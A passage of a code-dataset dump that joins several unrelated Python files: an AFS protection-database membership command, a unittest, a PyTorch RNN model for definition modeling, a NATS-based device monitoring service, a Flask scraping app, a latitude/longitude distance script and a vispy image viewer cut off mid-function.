of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public Licence for more details.\n\nYou should have received a copy of the GNU General Public Licence\nalong with this program; if not, write to the Free Software\nFoundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n\"\"\"\n\nfrom afs.argparse import *\nfrom afs.lib.output import *\nimport kafs\nimport sys\n\nhelp = \"Show the Protection Database groups owned by a user or group\"\n\ncommand_arguments = [\n [ \"nameorid\", get_strings, \"rm\", \"+\" ],\n [ \"supergroups\", get_dummy, \"fn\" ],\n [ \"expandgroups\", get_dummy, \"fn\" ],\n [ \"cell\", get_cell, \"os\", \"\" ],\n [ \"noauth\", get_auth, \"fn\" ],\n [ \"localauth\", get_auth, \"fn\" ],\n [ \"verbose\", get_verbose, \"fn\" ],\n [ \"encrypt\", get_dummy, \"fn\" ],\n [ \"force\", get_dummy, \"fn\" ],\n]\n\ncant_combine_arguments = [\n ( \"cell\", \"localauth\" ),\n ( \"noauth\", \"localauth\" ),\n]\n\nargument_size_limits = {\n \"nameorid\" : kafs.PR_MAXNAMELEN,\n}\n\ndescription = r\"\"\"\nShow the Protection Database groups owned by a user or group\n\"\"\"\n\ndef main(params):\n cell = params[\"cell\"]\n prcache = cell.get_prcache(params)\n\n for name in params[\"nameorid\"]:\n prcache.precache_name_or_id(name)\n\n requests = []\n memberships = dict()\n\n for name in params[\"nameorid\"]:\n gid = prcache.name_or_id_to_id(name)\n if gid == None:\n error(\"User or group doesn't exist so couldn't look up id for \" + name + \"\\n\")\n if \"force\" not in params:\n break\n continue\n\n if gid not in requests:\n try:\n if gid < 0:\n # Group\n verbose(\"Listing membership of \", gid, \" (\", name, \")\\n\")\n group = prcache.id_to_group(gid)\n prcache.precache_ids(group)\n else:\n # User - ListElements returns the ancestry of a non-group\n ret = cell.call_pt_server(params, kafs.PR_ListElements, gid)\n elist = ret.elist\n memberships[gid] = elist\n prcache.precache_ids(elist)\n for i in elist:\n if i < 0:\n prcache.id_to_group(i)\n requests.append(gid)\n\n except kafs.AbortPRNOENT:\n error(\"User or group doesn't exist \", name, \" (id \", gid, \")\\n\")\n prcache.id_is_unknown(gid)\n if \"force\" not in params:\n break\n except kafs.AbortPRPERM:\n error(\"Permission denied on ID \", name, \" (id: \", gid, \")\\n\")\n prcache.id_is_unknown(gid)\n if \"force\" not in params:\n break\n\n if \"expandgroups\" in params:\n groups_needing_expansion = set(prcache.known_groups())\n verbose(\"Expand groups \", groups_needing_expansion, \"\\n\")\n while groups_needing_expansion:\n gid = groups_needing_expansion.pop()\n members = prcache.id_to_group(gid)\n for m in members:\n prcache.precache_id(m)\n if m < 0 and not prcache.have_group(m) and m not in groups_needing_expansion:\n groups_needing_expansion.add(m)\n\n if \"supergroups\" in params:\n for r in requests:\n if r < 0:\n ret = cell.call_pt_server(params, kafs.PR_ListGroupsMemberOf, r)\n glist = ret.glist\n memberships[r] = glist\n\n for r in requests:\n # Display members of a group\n if r < 0:\n if \"expandgroups\" in params:\n output(\"Expanded Members of \", prcache.id_to_name(r), \" (id: \", r, \") are:\\n\")\n for m in prcache.id_to_expanded_group(r):\n if m > 0:\n output(\" \", prcache.id_to_name(m), \"\\n\")\n else:\n output(\"Members of \", prcache.id_to_name(r), \" (id: \", r, \") are:\\n\")\n for m in prcache.id_to_group(r):\n output(\" \", prcache.id_to_name(m), \"\\n\")\n\n # Display membership of a user or a group\n if r > 0 and \"expandgroups\" in params:\n output(\"Expanded Groups \", prcache.id_to_name(r), \" (id: \", r, \") is a member of:\\n\")\n member_of = memberships[r]\n expanded = set(member_of)\n for gid in member_of:\n expanded |= prcache.id_to_expanded_group(gid)\n for m in expanded:\n if m < 0:\n output(\" \", prcache.id_to_name(m), \"\\n\")\n elif r > 0 or \"supergroups\" in params:\n output(\"Groups \", prcache.id_to_name(r), \" (id: \", r, \") is a member of:\\n\")\n for gid in memberships[r]:\n output(\" \", prcache.id_to_name(gid), \"\\n\")\n","repo_name":"whm/kafs-utils","sub_path":"suite/commands/pts/membership.py","file_name":"membership.py","file_ext":"py","file_size_in_byte":5572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2704913808","text":"import unittest\nimport json\n\nfrom motherbrain.models.operations import MBPipe\n\n\nclass TestMBPipe(unittest.TestCase):\n def setUp(self):\n self.data = {'first_name': 'Walter',\n 'last_name': 'Bishop'}\n\n display_name = lambda x: ','.join([x.get('last_name'),\n x.get('first_name')])\n\n uppercase_str = lambda x: {k:v.upper() for k,v in x.iteritems()\n if isinstance(v, str)}\n add_initials = lambda x: '{}, {}{}'.format(x,\n x[0],\n x.split(',')[1][0])\n\n self.display_name = display_name\n self.add_initials = add_initials\n self.uppercase_str = uppercase_str\n\n def testSingleFun(self):\n \"\"\"Testing Pipe with single function\"\"\"\n pipe = MBPipe(self.data, self.display_name)\n\n self.assertEqual('Bishop,Walter', pipe())\n\n def testMultiFun(self):\n \"\"\"Testing Pipe with multiple function\"\"\"\n pipe = MBPipe(self.data, self.uppercase_str,\n self.display_name,\n self.add_initials)\n\n self.assertEqual('BISHOP,WALTER, BW', pipe())\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"urlist/urlist","sub_path":"motherbrain/tests/pipe.py","file_name":"pipe.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"19"} +{"seq_id":"30259931333","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# author:haiton\n# datetime:18-9-11 下午11:30\nimport torch\nfrom torch import nn\nfrom model.layers import CharCNN, Hypernym, Hidden, Gated\nfrom regularize.embed_dropout import embedded_dropout\nfrom regularize.locked_dropout import LockedDropout\nfrom regularize.weight_dropout import WeightDrop\nimport numpy as np\nimport pickle\n\n\nclass RNNModel(nn.Module):\n def __init__(self, params):\n super(RNNModel, self).__init__()\n\n self.params = params\n self.rnn_type = self.params[\"rnn_type\"]\n self.n_layers = self.params[\"nlayers\"]\n self.hi_dim = self.params[\"hidim\"]\n self.embedding_dim = self.params[\"emdim\"]\n self.use_input = self.params[\"use_input\"]\n self.use_hidden = self.params[\"use_hidden\"]\n self.use_gated = self.params[\"use_gated\"]\n self.use_ch = self.params[\"use_ch\"]\n self.use_he = self.params[\"use_he\"]\n self.is_conditioned = self.use_input\n self.is_conditioned += self.use_hidden\n self.is_conditioned += self.use_gated\n self.device = torch.device('cuda' if self.params[\"cuda\"] else 'cpu')\n\n assert self.use_input + self.use_hidden + \\\n self.use_gated <= 1, \"Too many conditionings used\"\n\n self.drop = nn.Dropout(self.params[\"dropout\"])\n self.lockdrop = LockedDropout()\n self.hdrop = nn.Dropout(self.params[\"dropouth\"])\n self.idrop = nn.Dropout(self.params[\"dropouti\"])\n self.edrop = nn.Dropout(self.params[\"dropoute\"])\n self.dropout = self.params[\"dropout\"]\n self.dropouti = self.params[\"dropouti\"]\n self.dropouth = self.params[\"dropouth\"]\n self.dropoute = self.params[\"dropoute\"]\n\n self.embedding = nn.Embedding(self.params[\"vocab_size\"], self.embedding_dim)\n if self.params[\"w2v_weights\"]:\n with open(self.params[\"w2v_weights\"], 'rb') as infile:\n pretrain_emb = pickle.load(infile)\n infile.close()\n self.embedding.weight.data.copy_(\n torch.from_numpy(pretrain_emb)\n )\n else:\n self.embedding.weight.data.copy_(\n torch.from_numpy(\n self.random_embedding(self.params[\"vocab_size\"], self.embedding_dim)\n )\n )\n self.embedding.weight.requires_grad = not self.params[\"fix_embeddings\"]\n\n self.ch_dim = 0\n self.he_dim = 0\n # ch\n if self.use_ch:\n self.ch = CharCNN(\n n_ch_tokens=self.params[\"n_ch_tokens\"],\n ch_maxlen=self.params[\"ch_maxlen\"],\n ch_emb_size=self.params[\"ch_emb_size\"],\n ch_feature_maps=self.params[\"ch_feature_maps\"],\n ch_kernel_sizes=self.params[\"ch_kernel_sizes\"]\n )\n self.ch_dim = sum(self.params[\"ch_feature_maps\"])\n # he\n if self.use_he:\n self.he_dim = self.embedding_dim\n self.he = Hypernym(self.embedding_dim, self.embedding, self.device)\n concat_embedding_dim = self.embedding_dim + self.ch_dim + self.he_dim\n self.word2hidden = nn.Linear(concat_embedding_dim, self.hi_dim)\n if self.use_input:\n self.embedding_dim = self.embedding_dim + concat_embedding_dim\n if self.use_hidden:\n self.hidden = Hidden(\n in_size=concat_embedding_dim + self.hi_dim,\n out_size=self.hi_dim\n )\n if self.params[\"use_gated\"]:\n self.gated = Gated(\n cond_size=concat_embedding_dim,\n hidden_size=self.hi_dim\n )\n if self.rnn_type in ['LSTM', 'GRU']:\n self.rnn = getattr(nn, self.rnn_type)(self.embedding_dim, self.hi_dim, self.n_layers, dropout=0)\n else:\n try:\n nonlinearity = {'RNN_TANH': 'tanh', 'RNN_RELU': 'relu'}[self.rnn_type]\n except KeyError:\n raise ValueError(\"\"\"An invalid option for `--model` was supplied,\n options are ['LSTM', 'GRU', 'RNN_TANH' or 'RNN_RELU']\"\"\")\n self.rnn = nn.RNN(self.embedding_dim, self.hi_dim, self.n_layers, nonlinearity=nonlinearity, dropout=0)\n if self.params[\"wdrop\"] != 0:\n self.rnn = WeightDrop(self.rnn, ['weight_hh_l0'], dropout=self.params[\"wdrop\"])\n self.decoder = nn.Linear(self.hi_dim, self.params[\"vocab_size\"])\n if self.params[\"tied\"]:\n if self.hi_dim != self.embedding_dim:\n raise ValueError('When using the tied flag, nhid must be equal to emsize')\n self.decoder.weight = self.embedding.weight\n self.init_weights()\n\n def forward(self, inputs, init_hidden, return_h=False):\n word = inputs['word']\n seq = inputs['seq']\n if self.use_input:\n input_vectors = inputs[\"input_vectors\"]\n if self.use_ch:\n chars = inputs['chars']\n if self.use_he:\n hynm = inputs['hypm']\n hynm_weights = inputs['hypm_weights']\n batch_size = word.size(0)\n\n word_emb = embedded_dropout(self.embedding, word, dropout=self.dropoute if self.training else 0)\n seq_emb = embedded_dropout(self.embedding, seq, dropout=self.dropoute if self.training else 0)\n seq_emb = self.lockdrop(seq_emb, self.dropouti)\n if self.use_ch:\n char_embeddings = self.ch(chars)\n word_emb = torch.cat(\n [word_emb, char_embeddings], dim=-1)\n if self.use_he:\n hynm_embeddings = self.he([hynm, hynm_weights])\n word_emb = torch.cat(\n [word_emb, hynm_embeddings], dim=-1)\n if init_hidden is not None:\n hidden = init_hidden\n else:\n hidden = self.init_hidden(word_emb, batch_size, self.n_layers, self.hi_dim)\n raw_outputs = []\n lock_outputs = []\n outputs = []\n for time_step in range(seq.size(0)):\n if time_step != 0:\n raw_outputs = []\n lock_outputs = []\n inp_seq = seq_emb[time_step, :, :].view(1, batch_size, -1)\n if self.use_input:\n inp_seq = torch.cat([torch.unsqueeze(word_emb, 0), inp_seq], dim=-1)\n outs, hidden = self.rnn(inp_seq, hidden)\n raw_outputs.append(outs)\n outs = self.lockdrop(outs, self.dropout)\n lock_outputs.append(outs)\n else:\n outs, hidden = self.rnn(inp_seq, hidden)\n raw_outputs.append(outs)\n outs = self.lockdrop(outs, self.dropout)\n lock_outputs.append(outs)\n if self.use_hidden:\n hidden = self.hidden(self.rnn_type, self.n_layers, word_emb, hidden)\n if self.use_gated:\n hidden = self.gated(self.rnn_type, self.n_layers, word_emb, hidden)\n if time_step == 0:\n rnn_hs = raw_outputs\n dropped_rnn_hs = lock_outputs\n else:\n for i in range(len(rnn_hs)):\n rnn_hs[i] = torch.cat((rnn_hs[i], raw_outputs[i]), 0)\n dropped_rnn_hs[i] = torch.cat((dropped_rnn_hs[i], lock_outputs[i]), 0)\n outputs.append(outs)\n outputs = torch.cat(outputs, dim=0)\n outputs = outputs.view(outputs.size(0) * outputs.size(1), outputs.size(2))\n decoded = self.decoder(self.drop(outputs))\n if return_h:\n return decoded, hidden, rnn_hs, dropped_rnn_hs\n return decoded, hidden\n\n def init_weights(self):\n for name, param in self.rnn.named_parameters():\n if 'bias' in name:\n nn.init.constant_(param, 0.0)\n elif 'weight' in name:\n nn.init.xavier_normal_(param)\n nn.init.constant_(self.word2hidden.bias, 0.0)\n nn.init.xavier_normal_(self.word2hidden.weight)\n # maybe not use init decoder?\n nn.init.constant_(self.decoder.bias, 0.0)\n nn.init.xavier_normal_(self.decoder.weight)\n if self.use_hidden:\n self.hidden.init_hidden()\n if self.use_gated:\n self.gated.init_gated()\n if self.use_ch:\n self.ch.init_ch()\n\n def random_embedding(self, vocab_size, embedding_dim):\n pretrain_emb = np.empty([vocab_size, embedding_dim])\n scale = np.sqrt(3.0 / embedding_dim)\n for i in range(vocab_size):\n pretrain_emb[i, :] = np.random.uniform(-scale, scale, [1, embedding_dim])\n return pretrain_emb\n\n def init_hidden(self, v, batch_size, num_layers, hidden_dim):\n hidden = self.word2hidden(v).view(-1, batch_size, hidden_dim)\n hidden = hidden.expand(num_layers, batch_size, hidden_dim).contiguous()\n if self.rnn_type == 'LSTM':\n ###############################################h,c fan\n h_c = hidden\n h_h = torch.zeros_like(h_c)\n hidden = (h_h, h_c)\n return hidden\n","repo_name":"Haitons/definition-modeling-pytorch","sub_path":"model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":9026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74243785642","text":"import argparse\nimport asyncio\nimport json\nimport logging\nimport os.path\nimport random\nimport time\n\nfrom inu import Inu, InuHandler, Status\nfrom inu import const\nfrom inu.const import Priority\nfrom inu.schema import Alert, Log, Heartbeat\nfrom micro_nats import error as mn_error, model\nfrom micro_nats.jetstream.error import ErrorResponseException\nfrom micro_nats.jetstream.protocol.consumer import Consumer, ConsumerConfig\nfrom micro_nats.util import Time\nfrom sentry import logger as sentry_logger, alerter as sentry_alerter\n\n\nclass Device:\n def __init__(self, device_id: str, hb_freq: int):\n self.device_id = device_id\n self.heartbeat_freq = hb_freq\n self.last_heartbeat = time.monotonic()\n\n def has_expired(self, missed=5) -> bool:\n \"\"\"\n Check if the device is considered offline (heartbeat expired).\n \"\"\"\n if self.last_heartbeat is None:\n return False\n\n return (time.monotonic() - self.last_heartbeat) > (self.heartbeat_freq * missed)\n\n def beat(self):\n \"\"\"\n Received a heartbeat from this device.\n \"\"\"\n self.last_heartbeat = time.monotonic()\n\n\nclass Sentry(InuHandler):\n MISSED_HEARTBEATS_ALARM = 5\n DEFAULT_PRIORITY = 3\n\n def __init__(self, args: argparse.Namespace):\n self.sentry_logger: sentry_logger.Logger | None = None\n self.sentry_alerter: sentry_alerter.Alerter | None = None\n self.config = {}\n\n self.logger = logging.getLogger('inu.sentry')\n self.load_config(args.config)\n\n self.inu = Inu(const.Context(\n device_id=[\"sentry\", f\"i{random.randint(1000, 9999)}\"],\n nats_server=self.get_config(\"nats\", \"nats://127.0.0.1:4222\"),\n ), self)\n\n self.device_pool = {}\n self.consumers = [\n (const.Streams.HEARTBEAT, const.Subjects.HEARTBEAT, self.on_hb),\n (const.Streams.ALERTS, const.Subjects.ALERT, self.on_alert),\n (const.Streams.SETTINGS, const.Subjects.SETTINGS, self.on_settings),\n (const.Streams.COMMAND, const.Subjects.COMMAND, self.on_command),\n (const.Streams.LOGS, const.Subjects.LOG, self.on_log),\n (const.Streams.STATUS, const.Subjects.STATUS, self.on_status),\n ]\n\n def load_config(self, fn):\n \"\"\"\n Load the settings.json file. Should only ever be called once.\n \"\"\"\n if not os.path.exists(fn):\n raise FileNotFoundError(f\"Config file not found at: {fn}\")\n\n with open(fn) as fp:\n self.config = json.load(fp)\n\n # Create a log engine from config\n log_engine = self.get_config([\"logger\", \"engine\"])\n if log_engine == \"loki\":\n self.sentry_logger = sentry_logger.LokiLogger(self.get_config(\"logger\"))\n else:\n self.logger.warning(\"No known logger configured\")\n\n # Create an alert engine from config\n alert_engine = self.get_config([\"alerter\", \"engine\"])\n if alert_engine == \"pagerduty\":\n self.sentry_alerter = sentry_alerter.PagerDuty(self.get_config(\"alerter\"))\n else:\n self.logger.warning(\"No known alerter configured\")\n\n def get_config(self, key: str | list, default=None):\n \"\"\"\n Get a setting from the local config, or return the default.\n \"\"\"\n if isinstance(key, list):\n path = self.config\n for subkey in key:\n if subkey not in path:\n return default\n path = path[subkey]\n return path\n\n if key in self.config:\n return self.config[key]\n else:\n return default\n\n async def run(self):\n # Init Inu\n if not await self.inu.init():\n return\n\n try:\n while True:\n await self.check_heartbeats()\n await asyncio.sleep(0.1)\n except asyncio.exceptions.CancelledError:\n pass\n\n async def check_heartbeats(self):\n \"\"\"\n Iterates each known device and checks if their heartbeat has expired.\n\n If it has, it will raise an alert and remove the device from the pool.\n \"\"\"\n del_list = []\n for device_id, device in self.device_pool.items():\n if device.has_expired(self.MISSED_HEARTBEATS_ALARM):\n alert = f\"Device <{device_id}> died\"\n await self.inu.alert(alert, await self.get_device_priority(device_id))\n del_list.append(device_id)\n\n for device_id in del_list:\n del self.device_pool[device_id]\n\n async def on_connect(self, server: model.ServerInfo):\n self.logger.info(\"Connected to NATS server\")\n ack_wait = Time.sec_to_nano(1.5)\n\n try:\n for stream_name, subj, cb in self.consumers:\n self.logger.debug(f\"Subscribing to '{stream_name}'\")\n await self.inu.js.consumer.create(\n Consumer(stream_name, ConsumerConfig(\n filter_subject=const.Subjects.all(subj),\n deliver_policy=ConsumerConfig.DeliverPolicy.NEW,\n ack_wait=ack_wait,\n )), cb,\n )\n\n except mn_error.NotFoundError:\n self.logger.error(\"Stream not found. Ensure NATS environment is bootstrapped.\")\n return\n\n except ErrorResponseException as e:\n err = e.err_response\n self.logger.error(f\"NATS: {err.code}-{err.err_code}: {err.description}\")\n\n except Exception as e:\n self.logger.error(f\"Subscribe error: {type(e).__name__}: {e}\")\n return\n\n async def publish_log(self, stream: str, ts: int, msg: str, labels: dict):\n \"\"\"\n Send a log directly to the logging engine.\n \"\"\"\n if self.sentry_logger is None:\n return\n\n await self.sentry_logger.publish(stream=stream, ts=ts, msg=msg, labels=labels)\n\n async def on_log(self, msg: model.Message):\n \"\"\"\n Generic log line - send to the logging system (eg Loki).\n \"\"\"\n await self.inu.js.msg.ack(msg)\n device_id = msg.get_subject()[len(const.Subjects.LOG) + 1:]\n log = Log(msg.get_payload())\n await self.publish_log(\n const.Streams.LOGS,\n msg.time_ns,\n json.dumps({\n \"device_id\": device_id,\n \"log_level\": log.level,\n \"message\": log.message,\n }),\n {\n \"device_id\": device_id,\n \"log_level\": log.level,\n }\n )\n\n async def on_alert(self, msg: model.Message):\n \"\"\"\n Alert - this needs to go to paging tool (eg Pagerduty) and log engine.\n \"\"\"\n await self.inu.js.msg.ack(msg)\n device_id = msg.get_subject()[len(const.Subjects.ALERT) + 1:]\n alert = Alert(msg.get_payload())\n\n # Send to logger\n await self.publish_log(\n const.Streams.ALERTS,\n msg.time_ns,\n json.dumps({\n \"device_id\": device_id,\n \"priority\": f\"P{alert.priority}\",\n \"message\": alert.message,\n }),\n {\n \"device_id\": device_id,\n \"priority\": str(alert.priority),\n }\n )\n\n # Send to alerter\n if self.sentry_alerter is not None and alert.priority < Priority.LOWEST:\n await self.sentry_alerter.publish(device_id, alert.message, alert.priority)\n\n async def get_device_priority(self, device_id: str) -> int:\n \"\"\"\n Looks up a device to determine its device priority. Will use a default if settings now found or missing.\n \"\"\"\n try:\n dvc_settings = await self.inu.js.msg.get_last(\n const.Streams.SETTINGS,\n const.Subjects.fqs(const.Subjects.SETTINGS, device_id)\n )\n\n p = int(dvc_settings.from_json()['device_priority'])\n return min(const.Priority.LOWEST, max(const.Priority.HIGHEST, p))\n except mn_error.NotFoundError:\n return self.DEFAULT_PRIORITY\n except Exception as e:\n self.logger.error(f\"Error getting device priority - {type(e)}: {e}\")\n return self.DEFAULT_PRIORITY\n\n async def on_hb(self, msg: model.Message):\n \"\"\"\n Heartbeat from a device. Used to track when a device goes offline.\n \"\"\"\n await self.inu.js.msg.ack(msg)\n device_id = msg.get_subject()[len(const.Subjects.HEARTBEAT) + 1:]\n hb = Heartbeat(msg.get_payload())\n\n if device_id in self.device_pool:\n self.device_pool[device_id].beat()\n else:\n dvc = Device(device_id, hb_freq=hb.interval)\n self.device_pool[device_id] = dvc\n await self.inu.log(f\"Device <{device_id}> now online\")\n\n async def on_settings(self, msg: model.Message):\n \"\"\"\n New settings have been published. Send to logging tool.\n \"\"\"\n device_id = msg.get_subject()[len(const.Subjects.SETTINGS) + 1:]\n await self.publish_log(\n const.Streams.SETTINGS,\n msg.time_ns,\n json.dumps({\n \"device_id\": device_id,\n \"settings\": msg.from_json(),\n }),\n {\n \"device_id\": device_id,\n }\n )\n\n async def on_command(self, msg: model.Message):\n \"\"\"\n Command (eg trigger). Send to logging tool.\n \"\"\"\n await self.inu.js.msg.ack(msg)\n subj = msg.get_subject()[len(const.Subjects.COMMAND) + 1:].split(\".\", 1)\n cmd = subj[0]\n device_id = subj[1]\n await self.publish_log(\n const.Streams.COMMAND,\n msg.time_ns,\n json.dumps({\n \"device_id\": device_id,\n \"command\": cmd,\n \"payload\": msg.from_json(),\n }),\n {\n \"device_id\": device_id,\n \"command\": cmd,\n }\n )\n\n async def on_status(self, msg: model.Message):\n \"\"\"\n Device change state.\n \"\"\"\n await self.inu.js.msg.ack(msg)\n device_id = msg.get_subject()[len(const.Subjects.STATUS) + 1:]\n status = Status(msg.get_payload())\n await self.publish_log(\n const.Streams.STATUS,\n msg.time_ns,\n json.dumps({\n \"device_id\": device_id,\n \"enabled\": status.enabled,\n \"locked\": status.locked,\n \"active\": status.active,\n \"status\": status.status,\n }),\n {\n \"device_id\": device_id,\n \"status_enabled\": str(status.enabled),\n \"status_locked\": str(status.locked),\n \"status_active\": str(status.active),\n }\n )\n","repo_name":"jordonsc/inu-py","sub_path":"src/sentry/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":10869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"47777442673","text":"from flask import Flask, render_template, redirect\nfrom flask_pymongo import MongoClient\nimport pymongo\nfrom scrape_mars import scrape\nimport os\n\napp = Flask(__name__)\n\nclient= pymongo.MongoClient('mongodb://localhost:27017/')\ndb = client['mars']\n\n\n#---------------------------------------------------------\n@app.route('/')\ndef index():\n mars = db.mars.find_one()\n return render_template('index.html', mars=mars)\n\n#start scrape route; inserts results into mars MongoDB\n#---------------------------------------------------------\n@app.route('/scrape')\ndef get():\n mars = db.mars\n data = scrape()\n mars.update({}, data, upsert=True)\n\n return redirect('http://localhost:5000/', code=302)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True, host='127.0.0.1', port=5000)\n","repo_name":"ksk4uever/WebScraping-Mission-to-Mars","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70490485803","text":"import math\n\n# to calculate the distance using latitude, longitude, and altitude\n# we cannot use the Euclidean distance right away\n# instead, we can use the Haversine formula to calculate the distance using longitude and latitude\n# then we can use the Euclidean distance formula to calculate the distance using altitude\n\n# Earth radius\nearth_radius = 63781000000\n\n# Calculate the altitude (vertical) distance\ndef altDistance(alt1, alt2):\n distance = abs(alt1 - alt2)\n\n return distance\n\n# Calculate the longitude-latitude (horizontal) distance\ndef longLatDistance(long1, long2, lat1, lat2):\n distance = 2 * earth_radius * math.asin(math.sqrt(math.sin((lat2 - lat1)/2)**2 + math.cos(lat1)*math.cos(lat2)*math.sin((long2 - long1)/2)**2))\n\n return distance\n\n# Calculate the final distance\ndef finalDistance(altDistance, longLatDistance):\n distance = math.sqrt(altDistance**2 + longLatDistance**2)\n\n return distance\n\n# Get the input\ndef getInput():\n # Point 1\n print(\"Please input your 1st point data\")\n lat1 = float(input(\"Latitude 1: \"))\n long1 = float(input(\"Longitude 1: \"))\n alt1 = float(input(\"Altitude 1: \"))\n\n # Point 2\n print(\"\\nPlease input your 2nd point data\")\n lat2 = float(input(\"Latitude 2: \"))\n long2 = float(input(\"Longitude 2: \"))\n alt2 = float(input(\"Altitude 2: \"))\n \n return lat1, long1, alt1, lat2, long2, alt2\n\nif (__name__) == '__main__':\n # Assign the data\n lat1, long1, alt1, lat2, long2, alt2 = getInput()\n\n # Convert the latitude and the longitude into radians\n lat1, long1, lat2, long2 = map(math.radians, [lat1, long1, lat2, long2])\n\n # Get the vertical distance\n vert_distance = altDistance(alt1, alt2)\n print(\"\\nVertical Distance: \", vert_distance)\n\n # Get the horizontal distance\n horiz_distance = longLatDistance(long1, long2, lat1, lat2)\n print(\"Horizontal DistanceL :\", horiz_distance)\n\n # Get the final distance\n final_distance = finalDistance(vert_distance, horiz_distance)\n print(\"Distance of 2 points: \", final_distance)","repo_name":"sulaimanfawwazak/GAMAFORCE-VHC-Assignment","sub_path":"bagian-d/2/3d-distance/3d-distance.py","file_name":"3d-distance.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20704441078","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nShow an image using gloo, with on-mouseover cross-section visualizations.\n\"\"\"\n\nimport numpy as np\nfrom vispy import app\nfrom vispy.gloo import set_viewport, clear, set_state, Program\n\n\n# Image\ndef func(x, y):\n return (1-x/2+x**5+y**3)*np.exp(-x**2-y**2)\nx = np.linspace(-3.0, 3.0, 512).astype(np.float32)\ny = np.linspace(-3.0, 3.0, 512).astype(np.float32)\nX, Y = np.meshgrid(x, y)\nidxs = func(X, Y)\n\n# Image normalization\nvmin, vmax = idxs.min(), idxs.max()\nidxs = (idxs - vmin) / (vmax - vmin)\n\n\n# Colormaps\ncolormaps = np.ones((16, 512, 4)).astype(np.float32)\nvalues = np.linspace(0, 1, 512)[1:-1]\n\n# Hot colormap\ncolormaps[0, 0] = 0, 0, 1, 1 # Low values (< vmin)\ncolormaps[0, -1] = 0, 1, 0, 1 # High values (> vmax)\ncolormaps[0, 1:-1, 0] = np.interp(values, [0.00, 0.33, 0.66, 1.00],\n [0.00, 1.00, 1.00, 1.00])\ncolormaps[0, 1:-1, 1] = np.interp(values, [0.00, 0.33, 0.66, 1.00],\n [0.00, 0.00, 1.00, 1.00])\ncolormaps[0, 1:-1, 2] = np.interp(values, [0.00, 0.33, 0.66, 1.00],\n [0.00, 0.00, 0.00, 1.00])\n\n# Grey colormap\ncolormaps[1, 0] = 0, 0, 1, 1 # Low values (< vmin)\ncolormaps[1, -1] = 0, 1, 0, 1 # High values (> vmax)\ncolormaps[1, 1:-1, 0] = np.interp(values, [0.00, 1.00],\n [0.00, 1.00])\ncolormaps[1, 1:-1, 1] = np.interp(values, [0.00, 1.00],\n [0.00, 1.00])\ncolormaps[1, 1:-1, 2] = np.interp(values, [0.00, 1.00],\n [0.00, 1.00])\n# Jet colormap\n# ...\n\n\nlines_vertex = \"\"\"\nattribute vec2 position;\nattribute vec4 color;\nvarying vec4 v_color;\nvoid main()\n{\n gl_Position = vec4(position, 0.0, 1.0 );\n v_color = color;\n}\n\"\"\"\n\nlines_fragment = \"\"\"\nvarying vec4 v_color;\nvoid main()\n{\n gl_FragColor = v_color;\n}\n\"\"\"\n\n\nimage_vertex = \"\"\"\nattribute vec2 position;\nattribute vec2 texcoord;\n\nvarying vec2 v_texcoord;\nvoid main()\n{\n gl_Position = vec4(position, 0.0, 1.0 );\n v_texcoord = texcoord;\n}\n\"\"\"\n\nimage_fragment = \"\"\"\nuniform float vmin;\nuniform float vmax;\nuniform float cmap;\nuniform float n_colormaps;\n\nuniform sampler2D image;\nuniform sampler2D colormaps;\n\nvarying vec2 v_texcoord;\nvoid main()\n{\n float value = texture2D(image, v_texcoord).r;\n float index = (cmap+0.5) / n_colormaps;\n\n if( value < vmin ) {\n gl_FragColor = texture2D(colormaps, vec2(0.0,index));\n } else if( value > vmax ) {\n gl_FragColor = texture2D(colormaps, vec2(1.0,index));\n } else {\n value = (value-vmin)/(vmax-vmin);\n value = 1.0/512.0 + 510.0/512.0*value;\n gl_FragColor = texture2D(colormaps, vec2(value,index));\n }\n}\n\"\"\"\n\n\nclass Canvas(app.Canvas):\n def __init__(self):\n app.Canvas.__init__(self, size=(512, 512),\n keys='interactive')\n\n self.image = Program(image_vertex, image_fragment, 4)\n self.image['position'] = (-1, -1), (-1, +1), (+1, -1), (+1, +1)\n self.image['texcoord'] = (0, 0), (0, +1), (+1, 0), (+1, +1)\n self.image['vmin'] = +0.0\n self.image['vmax'] = +1.0\n self.image['cmap'] = 0 # Colormap index to use\n self.image['colormaps'] = colormaps\n self.image['n_colormaps'] = colormaps.shape[0]\n self.image['image'] = idxs.astype('float32')\n self.image['image'].interpolation = 'linear'\n\n set_viewport(0, 0, *self.physical_size)\n\n self.lines = Program(lines_vertex, lines_fragment)\n self.lines[\"position\"] = np.zeros((4+4+514+514, 2), np.float32)\n color = np.zeros((4+4+514+514, 4), np.float32)\n color[1:1+2, 3] = 0.25\n color[5:5+2, 3] = 0.25\n color[9:9+512, 3] = 0.5\n color[523:523+512, 3] = 0.5\n self.lines[\"color\"] = color\n\n set_state(clear_color='white', blend=True,\n blend_func=('src_alpha', 'one_minus_src_alpha'))\n\n self.show()\n\n def on_resize(self, event):\n set_viewport(0, 0, *event.physical_size)\n\n def on_draw(self, event):\n clear(color=True, depth=True)\n self.image.draw('triangle_strip')\n self.lines.draw('line_strip')\n\n def on_mouse_move(self, event):\n x, y = event.pos\n w, h = self.size\n\n # Make sure the mouse isn't outside of the viewport.\n x = max(0, min(x, w - 1))\n y = max(0, min(y, h - 1))\n\n yf = 1 - y/(h/2.)\n xf = x/(w/2.) - 1\n\n x_norm = int((x*512)//w)\n y_norm = int((y*512)//h)\n\n P = 